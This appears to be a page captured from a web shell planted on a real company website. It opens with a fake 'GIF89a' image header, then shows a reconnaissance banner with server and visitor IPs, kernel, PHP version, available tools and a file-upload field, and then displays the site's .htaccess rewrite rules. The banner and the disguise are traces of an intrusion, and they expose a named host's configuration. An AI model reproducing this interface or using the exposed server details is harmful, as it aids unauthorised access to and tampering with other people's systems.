GIF89a
| Server IP : 200.152.183.196 / Your IP : 216.73.216.150 Web Server : nginx/1.20.2 System : Linux server.teclabs.com.br 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64 User : re8rc56e54 ( 10140) PHP Version : 7.3.33 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/cial.ind.br/httpdocs/ |
Upload File : |
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}
RewriteRule ^home/?$ index.php [NC,L]
RewriteRule ^home/([a-z0-9-,.*%+-]+)/?$ index.php?lang_set=$1 [NC,L]
RewriteRule ^institucional/?$ institucional.php [NC,L]
RewriteRule ^videos/?$ videos.php [NC,L]
RewriteRule ^termos-condicoes/?$ termos-condicoes.php [NC,L]
RewriteRule ^politica-privacidade/?$ politica-privacidade.php [NC,L]
RewriteRule ^produtos/?$ produtos.php [NC,L]
RewriteRule ^produtos/([a-z0-9-,.*%+-]+)/?$ produtos.php?catkey=$1 [NC,L]
RewriteRule ^produtos/([a-z0-9-,.*%+-]+)/([a-z0-9-,.*%+-]+)/?$ produtos.php?titulo=$1&catkey=$2 [NC,L]
RewriteRule ^produto/?$ produto.php [NC,L]
RewriteRule ^produto/([a-z0-9-,.*%+-]+)/?$ produto.php?prokey=$1 [NC,L]
RewriteRule ^produto/([a-z0-9-,.*%+-]+)/([a-z0-9-,.*%+-]+)/?$ produto.php?titulo=$1&prokey=$2 [NC,L]
RewriteRule ^servicos/?$ servicos.php [NC,L]
RewriteRule ^servico/?$ servico.php [NC,L]
RewriteRule ^servico/([a-z0-9-,.*%+-]+)/?$ servico.php?serkey=$1 [NC,L]
RewriteRule ^servico/([a-z0-9-,.*%+-]+)/([a-z0-9-,.*%+-]+)/?$ servico.php?titulo=$1&serkey=$2 [NC,L]
RewriteRule ^blog/?$ blog.php [NC,L]
RewriteRule ^blog-descricao/([a-z0-9-,.*%+-]+)/?$ blog-descricao.php?notkey=$1 [NC,L]
RewriteRule ^blog-descricao/([a-z0-9-,.*%+-]+)/([a-z0-9-,.*%+-]+)/?$ blog-descricao.php?titulo=$1¬key=$2 [NC,L]
RewriteRule ^contato/?$ contato.php [NC,L]
RewriteRule ^contato/([a-z0-9-,.*%+-]+)/?$ contato.php?assunto=$1 [NC,L]
ErrorDocument 400 /home
ErrorDocument 401 /home
ErrorDocument 402 /home
ErrorDocument 403 /home
ErrorDocument 404 /home
ErrorDocument 405 /home
ErrorDocument 406 /home
ErrorDocument 407 /home
ErrorDocument 408 /home
ErrorDocument 409 /home
ErrorDocument 410 /home
ErrorDocument 411 /home
ErrorDocument 412 /home
ErrorDocument 413 /home
ErrorDocument 414 /home
ErrorDocument 500 /home
ErrorDocument 501 /home
ErrorDocument 502 /home
ErrorDocument 503 /home
ErrorDocument 504 /home
ErrorDocument 505 /home
# BEGIN cPanel-generated php ini directives, do not edit
# Manual editing of this file may result in unexpected behavior.
# To make changes to this file, use the cPanel MultiPHP INI Editor (Home >> Software >> MultiPHP INI Editor)
# For more information, read our documentation (https://go.cpanel.net/EA4ModifyINI)
<IfModule php7_module>
php_flag short_open_tag On
</IfModule>
<IfModule lsapi_module>
php_flag short_open_tag On
</IfModule>
# END cPanel-generated php ini directives, do not edit